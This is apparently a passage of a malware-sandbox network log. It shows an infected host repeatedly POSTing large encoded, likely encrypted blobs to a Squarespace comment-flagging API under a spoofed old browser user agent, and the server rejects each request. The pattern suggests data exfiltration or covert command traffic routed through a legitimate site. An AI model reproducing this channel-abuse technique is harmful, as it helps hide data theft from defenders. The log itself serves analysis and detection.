2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 35 67 50 53 45 54 6f 69 62 59 58 6d 6a 6e 6a 30 38 6a 72 30 4d 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0Zwosu5gPSEToibYXmjnj08jr0M3bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:57:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BaSaq_IHZdRrNmZkZjc3ZjM2N2NiZTA1MjlmMWY0YTc5NDUxMmVm; Path=/; Secure Set-Cookie: crumb=BbJvEp96dadmMGIwZWI5Mzg3MmRhMTZmZWIyZGM3NDYzMjhmZDkz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: LvizP7pg/GNXRwoDs Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbJvEp96dadmMGIwZWI5Mzg3MmRhMTZmZWIyZGM3NDYzMjhmZDkz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49881	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:01 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108352 Expect: 100-continue
2024-09-01 19:57:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 35 67 50 53 45 54 6f 69 62 59 58 25 32 42 56 57 55 55 67 31 78 31 59 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0Zwosu5gPSEToibYX%2BVWUUg1x1YHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 49 48 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f Data Ascii: IHJ8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTco
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 35 6c 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c Data Ascii: 5labaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9cl
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 53 Data Ascii: S
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 44 39 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 Data Ascii: D9PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwg
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 72 Data Ascii: r
2024-09-01 19:57:01 UTC	16306	OUT	Data Raw: 35 64 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 Data Ascii: 5dUPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7Ch
2024-09-01 19:57:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BU5yu0HtXygrMzA2ODBjZmQyNGNkYWFiYTJlOTAyYzliNDJjMDk1; Path=/; Secure Set-Cookie: crumb=BcN_BorRfC4nZjliOTRmMGQzZmFlYjY3MGE5ZTEyNTJjNThhZTY4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: nqvqrgU4/LpShnvzl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcN_BorRfC4nZjliOTRmMGQzZmFlYjY3MGE5ZTEyNTJjNThhZTY4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49882	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:02 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:02 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:02 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:02 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYqw-4uPLQ6qYWIwZWRmYWFlNjgwZmZjZmFmYThmNTkzMmViZWU5; Path=/; Secure Set-Cookie: crumb=Bevaf2HSeNcrODAyM2QxZDA4ODc4NWE1ZTRkOWE3ZjYyYTNmYjFj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: m0tWNiki/WOkat7je Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bevaf2HSeNcrODAyM2QxZDA4ODc4NWE1ZTRkOWE3ZjYyYTNmYjFj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49883	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:02 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:02 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:02 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:02 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZsuI3RHtl6ONWI5YmQyNDllNTUwNWRkMGQzYmVkNzNiMzU2MzZj; Path=/; Secure Set-Cookie: crumb=BWhS84HHC4RNNjhhMDhlZGE4ZjYzOTIwOGUwNTU5OTg4MzI0NDdk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: YKdfgsgl/1c6AD2D4 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWhS84HHC4RNNjhhMDhlZGE4ZjYzOTIwOGUwNTU5OTg4MzI0NDdk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49884	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:03 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116734 Expect: 100-continue
2024-09-01 19:57:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:03 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 35 67 50 53 45 54 6f 69 62 59 56 70 58 74 47 4c 4e 77 4a 34 4e 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0Zwosu5gPSEToibYVpXtGLNwJ4NHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:57:03 UTC	1	OUT	Data Raw: 61 Data Ascii: a
